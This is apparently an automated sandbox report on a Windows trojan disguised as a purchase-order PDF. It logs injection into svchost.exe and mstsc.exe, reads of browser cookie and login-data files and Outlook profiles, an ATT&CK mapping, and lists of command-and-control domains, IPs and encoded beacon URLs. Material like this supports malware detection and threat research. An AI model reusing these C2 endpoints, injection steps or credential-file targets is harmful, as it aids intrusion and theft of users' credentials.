            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe protection: read write
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mstsc.exe | Thread register set: target process: 5768
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 31FC008
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Code function: 0_2_00014A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_00014A35
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe | Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
            Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Code function: 0_2_00074A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid | 0_2_00074A08
            Source: PO-78140924.BAT.PDF.exe, 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: YKkstfciYBQ.exe, 00000003.00000002.3897163672.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000000.2070424166.0000000000D61000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: PO-78140924.BAT.PDF.exe, YKkstfciYBQ.exe, 00000003.00000002.3897163672.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000000.2070424166.0000000000D61000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: YKkstfciYBQ.exe, 00000003.00000002.3897163672.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000000.2070424166.0000000000D61000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: YKkstfciYBQ.exe, 00000003.00000002.3897163672.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000000.2070424166.0000000000D61000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Code function: 0_2_000387AB cpuid | 0_2_000387AB
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Code function: 0_2_00045007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter | 0_2_00045007
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Code function: 0_2_000440BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte | 0_2_000440BA
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Code function: 0_2_00014AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_00014AFE

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\mstsc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (one line per tactic; a technique followed by a count in parentheses was matched by that many signatures, the remaining entries are the unmatched matrix cells):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (312); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Virtualization/Sandbox Evasion (2); Process Injection (312); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (31); Software Packing (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery (2); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); File and Directory Discovery (2); System Information Discovery (115)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Email Collection (1); Input Capture (21); Archive Collected Data (1); Data from Local System (1); Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID: 1519457; Sample: PO-78140924.BAT.PDF.exe; Start date: 26/09/2024; Architecture: WINDOWS; Score: 100), rendered as text:

• Graph-level network: www.heldhold.xyz, www.useanecdotenow.tech and 16 other IPs or domains; "Performs DNS queries to domains with low reputation" is attached to www.heldhold.xyz
• Graph-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 7 other signatures
• PO-78140924.BAT.PDF.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  • starts svchost.exe: Maps a DLL or memory area into another process
    • injects YKkstfciYBQ.exe: Found direct / indirect Syscall (likely to bypass EDR); contacts www.heldhold.xyz (67.223.117.189, ports 49724, 49725, 49726, VIMRO-AS15189US, United States), www.mfgarage.net (85.153.138.113, ports 49740, 49741, 49742, TELECABLESpainES, Turkey) and 6 other IPs or domains
      • starts mstsc.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
        • starts firefox.exe

Source | Detection | Scanner | Label
PO-78140924.BAT.PDF.exe | 79% | ReversingLabs | Win32.Trojan.Strab
PO-78140924.BAT.PDF.exe | 100% | Avira | HEUR/AGEN.1353271
PO-78140924.BAT.PDF.exe | 100% | Joe Sandbox ML | -
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://www.heldhold.xyz/fava/?lHul=nfQTqL40vDEpIp30&vf5pwn=GCDZpLqdSYk7fT5BaAxVCvWfN8QL3LUdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQAngPiIKVJBW1l0NVsB5cz1lTXdEnKbnDfocvymGyGvQBrQ== | 0% | Avira URL Cloud | safe
http://www.mfgarage.net/3lu7/?vf5pwn=nzWofdhWpyQTuQkAURoZiOuSpDDcsuZ4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCJcPncARSRGAtt0+HcJ3GcQEnXiNUfFJGdHJ4JUWSbdHV9w==&lHul=nfQTqL40vDEpIp30 | 0% | Avira URL Cloud | safe
http://www.ultraleap.net/8pln/?vf5pwn=T9/DtY4QstE2hf5N+QbDCp08BY0+/KIvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9qM2494p5Ur94ranWdRPLWWfdK4ZvNUpqMUToNubzG0SM8g==&lHul=nfQTqL40vDEpIp30 | 0% | Avira URL Cloud | safe
https://whois.gandi.net/en/results?search=ultraleap.net | 0% | Avira URL Cloud | safe
http://www.linkwave.cloud/al6z/ | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
http://www.2bhp.com/a4ar/?vf5pwn=bigEPZ6XMKFUrjbkOOF/tc1QSeZpy4rj9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOCaAaQ3Lxux4SSFbsDgkYjgjAaiC5myZdzdYIguvdh1gvDg==&lHul=nfQTqL40vDEpIp30 | 0% | Avira URL Cloud | safe
http://www.dalong.site/v2c3/ | 0% | Avira URL Cloud | safe
http://www.b5x7vk.agency/zznj/ | 0% | Avira URL Cloud | safe
https://www.gandi.net/en/domain | 0% | Avira URL Cloud | safe
http://www.dalong.site/v2c3/?lHul=nfQTqL40vDEpIp30&vf5pwn=4KW7rJi8xQgG5JuhUUy4oHXtvgFnSuEzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxet5jRO5AJzixTprPi8JCHFDrvphN2mQYrYWI0Ljg/1k5GCA== | 0% | Avira URL Cloud | safe
http://www.asiapartnars.online/kt2f/ | 0% | Avira URL Cloud | safe
http://www.asiapartnars.online/kt2f/?vf5pwn=3qIRfQl/AKdo1myXluGCiikgEIMzjkfYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfHO+i2Ne6X81cG7kNzDpu31X3NSjbrBV+9ESn2I73xzu4qQ==&lHul=nfQTqL40vDEpIp30 | 0% | Avira URL Cloud | safe
http://www.mfgarage.net/3lu7/ | 0% | Avira URL Cloud | safe
http://www.ultraleap.net/8pln/ | 0% | Avira URL Cloud | safe
http://www.b5x7vk.agency | 0% | Avira URL Cloud | safe
https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3Fvf5pwn%3Dnz | 0% | Avira URL Cloud | safe
http://www.heldhold.xyz/fava/ | 0% | Avira URL Cloud | safe
http://www.63582.photo/5o7d/ | 0% | Avira URL Cloud | safe
http://www.63582.photo/5o7d/?vf5pwn=zMeRclQqEZ6cHEkv6r3h6rNdPeIv0NfXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGdsHlq0LOSSwDS14egmHnY5/1aPOe4+/4uS5IVfZSCCmkbAw==&lHul=nfQTqL40vDEpIp30 | 0% | Avira URL Cloud | safe
http://www.mgeducacaopro.online/xamn/ | 0% | Avira URL Cloud | safe
http://www.linkwave.cloud/al6z/?lHul=nfQTqL40vDEpIp30&vf5pwn=VRCNh0NW0GgzXjJ+E9kBcAqzCeGDRYuLK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cpu7tsWuW3JQaVwptT6evyL2oGhO/bgF+68v7eWhteCSlc6A== | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
webredir.vip.gandi.net | 217.70.184.50 | true | true | - | unknown
azkwupgf.as66588.com | 103.248.137.209 | true | true | - | unknown
dalong.site | 172.96.187.60 | true | true | - | unknown
www.b5x7vk.agency | 172.67.165.25 | true | true | - | unknown
www.heldhold.xyz | 67.223.117.189 | true | true | - | unknown
www.2bhp.com | 81.88.63.46 | true | true | - | unknown
linkwave.cloud | 3.33.130.190 | true | true | - | unknown
asiapartnars.online | 3.33.130.190 | true | true | - | unknown
mgeducacaopro.online | 3.33.130.190 | true | true | - | unknown
www.mfgarage.net | 85.153.138.113 | true | true | - | unknown
www.dalong.site | unknown | unknown | true | - | unknown
www.useanecdotenow.tech | unknown | unknown | true | - | unknown
www.ultraleap.net | unknown | unknown | true | - | unknown
www.linkwave.cloud | unknown | unknown | true | - | unknown
www.mgeducacaopro.online | unknown | unknown | true | - | unknown
www.63582.photo | unknown | unknown | true | - | unknown
www.asiapartnars.online | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.linkwave.cloud/al6z/ | true | Avira URL Cloud: safe | unknown
http://www.ultraleap.net/8pln/?vf5pwn=T9/DtY4QstE2hf5N+QbDCp08BY0+/KIvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9qM2494p5Ur94ranWdRPLWWfdK4ZvNUpqMUToNubzG0SM8g==&lHul=nfQTqL40vDEpIp30 | true | Avira URL Cloud: safe | unknown
http://www.mfgarage.net/3lu7/?vf5pwn=nzWofdhWpyQTuQkAURoZiOuSpDDcsuZ4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCJcPncARSRGAtt0+HcJ3GcQEnXiNUfFJGdHJ4JUWSbdHV9w==&lHul=nfQTqL40vDEpIp30 | true | Avira URL Cloud: safe | unknown
http://www.heldhold.xyz/fava/?lHul=nfQTqL40vDEpIp30&vf5pwn=GCDZpLqdSYk7fT5BaAxVCvWfN8QL3LUdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQAngPiIKVJBW1l0NVsB5cz1lTXdEnKbnDfocvymGyGvQBrQ== | true | Avira URL Cloud: safe | unknown
http://www.b5x7vk.agency/zznj/ | true | Avira URL Cloud: safe | unknown
http://www.dalong.site/v2c3/ | true | Avira URL Cloud: safe | unknown
http://www.2bhp.com/a4ar/?vf5pwn=bigEPZ6XMKFUrjbkOOF/tc1QSeZpy4rj9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOCaAaQ3Lxux4SSFbsDgkYjgjAaiC5myZdzdYIguvdh1gvDg==&lHul=nfQTqL40vDEpIp30 | true | Avira URL Cloud: safe | unknown
http://www.dalong.site/v2c3/?lHul=nfQTqL40vDEpIp30&vf5pwn=4KW7rJi8xQgG5JuhUUy4oHXtvgFnSuEzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxet5jRO5AJzixTprPi8JCHFDrvphN2mQYrYWI0Ljg/1k5GCA== | true | Avira URL Cloud: safe | unknown
http://www.asiapartnars.online/kt2f/?vf5pwn=3qIRfQl/AKdo1myXluGCiikgEIMzjkfYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfHO+i2Ne6X81cG7kNzDpu31X3NSjbrBV+9ESn2I73xzu4qQ==&lHul=nfQTqL40vDEpIp30 | true | Avira URL Cloud: safe | unknown
http://www.asiapartnars.online/kt2f/ | true | Avira URL Cloud: safe | unknown
http://www.mfgarage.net/3lu7/ | true | Avira URL Cloud: safe | unknown
http://www.63582.photo/5o7d/ | true | Avira URL Cloud: safe | unknown
http://www.63582.photo/5o7d/?vf5pwn=zMeRclQqEZ6cHEkv6r3h6rNdPeIv0NfXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGdsHlq0LOSSwDS14egmHnY5/1aPOe4+/4uS5IVfZSCCmkbAw==&lHul=nfQTqL40vDEpIp30 | true | Avira URL Cloud: safe | unknown
http://www.ultraleap.net/8pln/ | true | Avira URL Cloud: safe | unknown
http://www.heldhold.xyz/fava/ | true | Avira URL Cloud: safe | unknown
http://www.mgeducacaopro.online/xamn/ | true | Avira URL Cloud: safe | unknown
http://www.linkwave.cloud/al6z/?lHul=nfQTqL40vDEpIp30&vf5pwn=VRCNh0NW0GgzXjJ+E9kBcAqzCeGDRYuLK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cpu7tsWuW3JQaVwptT6evyL2oGhO/bgF+68v7eWhteCSlc6A== | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://whois.gandi.net/en/results?search=ultraleap.net | YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000004456000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000005096000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3899373295.0000000007390000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.gandi.net/en/domain | YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000004456000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000005096000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3899373295.0000000007390000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3Fvf5pwn%3Dnz | YKkstfciYBQ.exe, 00000003.00000002.3899395542.00000000050E6000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000005D26000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.b5x7vk.agency | YKkstfciYBQ.exe, 00000003.00000002.3900775999.00000000063C2000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
67.223.117.189 | www.heldhold.xyz | United States | 15189 | VIMRO-AS15189US | true
172.96.187.60 | dalong.site | Canada | 32475 | SINGLEHOP-LLCUS | true
103.248.137.209 | azkwupgf.as66588.com | Hong Kong | 59371 | DNC-ASDimensionNetworkCommunicationLimitedHK | true
172.67.165.25 | www.b5x7vk.agency | United States | 13335 | CLOUDFLARENETUS | true
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | true
